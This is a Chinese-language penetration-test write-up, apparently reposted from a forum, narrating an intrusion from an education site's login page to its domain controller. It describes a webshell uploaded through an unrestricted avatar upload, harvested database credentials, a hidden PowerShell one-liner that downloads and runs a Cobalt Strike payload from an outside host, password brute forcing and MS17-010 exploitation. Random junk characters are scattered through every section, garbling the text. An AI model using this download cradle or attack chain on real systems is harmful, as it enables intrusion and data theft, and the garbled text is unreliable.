, e! Z% I6 y* M& e 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ ~ L U9 O' U% u% W6 [$ a" V
8 S/ {% U! S; C9 u7 N) ?5 {, x* t
- w, q: J8 D3 H: i$ y" b
8 ? l$ \ w. X" x+ R
) i* u) ]* Y8 P; J1 N
正文
" G+ }1 k }& r( {6 r' T2 U( Z Y% A9 R: c" L4 z$ j; G6 O( y' {
+ ~' h! c2 N3 A7 B( |% O" l5 R: \ + G4 M5 P4 h3 K9 E, r L
7 n/ r* p: o' T& t. L) o
7 J I/ f3 n4 t. y
目标:www.xxxx.com(一家教育机构) 0 k, ]" X1 s; n% r1 R
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能3 h& T( J# ~5 E1 r
- m. l2 S' g3 F: }! q3 V
. f% Z& W7 ~4 o. X P; O3 N
9 `$ S: C1 |) |8 O o7 Z+ p% ^ $ @9 T' G$ y0 |9 o7 |, I
& g+ Y3 u* B1 p0 ]! _
进行了简单的信息搜集
$ q( u/ u, r% g; F( D# A
- T' K1 r: Y, f0 S/ q/ b) [& ]* L0 c; _" T
- G3 V* S9 S5 E* Z% O6 V; d
, s9 b+ H- y' i3 _8 w 子域名搜集 w& J: k! {1 S7 S
; ~7 b. @& y7 S( Z1 f
' [- d1 r7 Y) ~4 E$ F4 q " E) e3 m% Q5 g
; a9 P3 W A5 ~% y# h( G) [# R
2 i' z- C3 Y' E- r fofa找资产
6 w& M+ | c( r+ N& G - j* v& Z5 Z! L. F
0 H7 g }0 p) ]5 V+ E
3 ?2 y/ B5 Z+ f# S3 g0 {$ H8 `2 b% s* q( N: L
$ t9 Y9 e& o7 E6 H1 {: n
9 X0 Q- G$ T5 i: s$ p _% r" B! a8 U/ ~, l, W3 o2 T$ M7 T
一共七个资产。去重之后只有两个。 / W# |, g' ` Y7 p
# y7 n- i8 r6 o u# n6 p. H, N/ u# L5 R3 Z8 F4 w3 U
" v( i( h& i c3 b, Z1 Z8 q8 u& X* m
目录探测
7 d- ?) j+ B2 I5 n
; c% s: |3 P8 r, a
! W o) v3 e) q: |) X " a x* ]+ P3 y$ ~+ m. w+ H9 a
& M* l7 H. X# p; s
! {1 I: I* ^8 J: t 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 % S }3 w* F. \1 S! F
( _# l" U& @6 a: p5 ^" y; V8 c$ ~# c8 M1 P2 C+ H6 n$ ?* N
+ P* f. R2 h0 F7 e2 U) Y M
0 i7 r4 n0 I* M) f' A, @$ N 我又尝试了通过修改返回包来绕过登录界面
2 R; D/ L9 ?5 B7 c" E. D; L
* g; T% v# [# c" z1 L1 U, X
# S7 |! q B$ E+ _. j7 Z. L; i0 q
. ?% `( F$ a* W" R2 O i2 f [1 C' t3 q! C
% T8 q7 q2 M+ |$ @% E
还是不行,尝试注入无果0 l4 x4 D: G' A+ O. u) t
( w! ^5 o9 H$ z: |
K7 I) b ~- S8 q
2 B* Y7 l6 c- h! S" s7 s ( ^: t/ B* Q0 n1 p
5 ]. J( x! `5 Q: }' S9 V6 e
不过我目录探测出了一处Spring信息泄露
$ ~( i B) ~: @
8 ]8 e0 n: S4 J4 u% P" j$ q! z6 A4 @2 } ?; t
1 ?0 i) O8 m: M
# r$ p# M+ x) \( Y7 O' d
( q/ }& F, i: [
; c8 ~- D4 E) R# R7 _. I6 L
6 }( v) @! N/ |) j9 j0 h0 J 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录0 H" C% I8 Q( t7 \7 u+ W
( ]% B" E* K3 F, G
+ i# o [' f; _$ c8 e! u
+ @' o" ?% J |( q9 U
7 t; j9 Z* z8 I; d, X4 E
( D* b. B0 i4 P3 q! t
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
: \- A. G3 k! A3 S. U: Q# Y4 d: W ! d$ F! J+ q1 @9 `8 y* Y! T
1 B/ c/ R! t2 ^6 e" A
' _# _/ J( ]/ e$ ~* \
" d; k. w* U6 g; N& E4 V$ W/ i. Z8 A; U7 v8 |1 \, x: G% \ _
获取有些师傅到这一步就手机抓包电脑测了。 H% _" w/ B0 i6 ?4 ?& t
6 ]- e6 r. y! [ K; G5 K* q0 P
) \0 }) r O6 v Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 r) Z1 p7 P$ E+ U! E; M x) N8 Y9 I" {
" q! j) f8 a+ F3 r( g* X6 p& w4 N6 q5 H6 U) v) A1 p
其中在一个公众号发现了小程序,可以进行注册。
9 |& k; S* r% p* c2 \ * c- N% f2 J1 K% x" [% I
& t6 q* Y, x" U: i0 K0 E P+ H- V 看到了头像上传,尝试上传获取WebShell
$ C: i( Q0 Y2 E5 c0 ] 4 b, ]& g1 J6 c4 G
Z3 O$ u3 _$ \1 U
" e+ B- q2 g4 ~+ G6 G
; B$ N7 m8 D1 x- P3 T
/ T0 L8 N# ]( x6 F: h 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 k; ^) I9 m3 W) q9 r4 M
7 d& ~$ D% x0 s/ R% v7 y
& p3 j2 H) |, i! f( Y- h
5 l" C: D/ `9 ~. P# ~
8 q+ ~; A& i4 ]% E# m9 L4 p- i0 ?1 k' _. S8 n3 |
然后上了大马
7 y7 {: q$ K- G6 P+ S8 H * W4 A* J/ n- l' c! Q
# L) ?' O, x0 o2 c* {* W
0 J% x. e* a" N$ B
4 l4 T* Z2 o; X; `
" z& {1 o0 g i+ s8 D" s, r5 w
5 Q" A) B) p6 ^8 w6 g: R5 k, v
( [0 m1 y6 a$ h5 p+ x1 ]2 u$ m% C4 _; o7 j4 k- a' W
通过翻找文件发现数据库账号密码
\* o9 ]9 Q; I2 ^ F 1 D; e* @9 i+ W3 ]6 e# ], }1 v' p; I
4 R, c* I+ Q8 d8 g
8 E( i. ~8 _" U- }+ V; J" T. K ' }% p* ~2 T, i, \/ X8 j& a
# t6 P$ k( x- _: S% p
--内网渗透) V3 k3 [+ H5 |* Q8 ], ]/ F
, T& K: F6 J3 ?: f' Y
# X" _: `# C% V9 f+ X! L2 ]7 x 直接通过powershell执行 cs上线
0 Y" p/ u7 H4 b; |) S 9 E" x6 C( O$ ]" {1 K- N5 X
9 l; f/ E0 ?; C* H: n0 V powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
$ |7 l( m8 e0 H, {$ Y& k6 a0 J6 D
; b. X* [ C: a* k% ^5 H0 o& C( H0 G0 I3 X; s& W8 R5 g
( s- |- C8 j' B& o1 }( I
' U7 F8 C# b# w) e1 L2 B
; N T3 B. h. _9 R3 y 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
9 t4 [' E- Z& H! c( G5 G3 @ h/ y9 @" _# }. L
) @( g- Y% G6 K4 @) a3 k
r. x X& v+ m8 Y4 i
! _! I3 \! r; \2 ~8 e7 {( j) W
6 B5 G- c" D7 f) Q ] 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! l- J- _; ]$ w) R) q
: ^% a) P7 X' P* K: z
1 L. Q- [! f, L/ Z( H& r/ b7 O3 @% J: ^- S, S5 m1 J X5 S; M* `
0 ]; S4 q* Y- o5 I0 l: m( M2 C3 u
$ a" m& J' |3 `$ u' b# O a
- N, I: @( }% @- q2 F5 K . a7 v. z. w& \: @. I% `! H8 \3 H
% E6 z8 D7 U' o" r( p' `# B
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 , |2 F1 h) C2 G: k8 |! R
% z7 f7 ]: \* P G9 {& b/ y/ ~
* o9 t/ f) b- Q% _ / d- _% y* T) g$ U' z: V* \
_' u' o, I; l m
( B& w% C5 q/ }8 n
- W% V/ @$ }1 c( j
: }+ c% L/ z. y3 j" @
( K% l2 L+ }6 {' j 4 o% v' Y3 \# o0 U; ]* r% J7 @ F
4 Y% y8 ?# }3 x/ F3 ^' v - U# k) E( A& l# Z- q3 n, _
a- @# |+ `! I) ]8 a
, M* x. w. Q, o( b/ B
' d- Y9 c! V: \8 ?# U9 `3 e# [. s' P2 |5 f3 S6 s
小结6 g" P( [( I: R6 y" g
5 q: l( ]# M6 U {( u. H" N4 ~
/ j- ?. C/ Y. ]; `' N5 D4 W. a& ?
! y2 S1 |0 Z7 L1 s
. Z5 m8 F- J" e( ]2 g. }# V# @' i
0 d9 l: s( l$ q 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!8 z6 L2 g! J7 X7 u
9 ~% U, r; z. \1 _7 F; g$ s: s3 b2 `0 R& z, P/ C" G
3 @# f2 w, m2 h2 |$ q
& y, m/ S# Q" Z
) l4 C- T6 e, S- Y( D9 M& U* `/ _# Q& V - ; }$ p+ t! L/ q$ H7 D2 Y7 {% }
. c3 x* v! R d; ~
4 X/ {3 i+ j* q( P, L - 0 M) r- M2 _8 D6 }9 K/ z
1 q7 j' T9 R- s
/ f$ o. }, v) i, Y& y) D
' Z- V, z3 t4 x* f6 G# _- e* o+ e1 D2 l! l4 K! T F
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
, I5 i9 G7 `+ ^ Q6 f, H& G8 d
; E: G7 _6 Z. X8 o& f. m$ k
) v5 ^7 M# H" R7 I
1 `$ j L, ~$ O" v' o4 F5 H |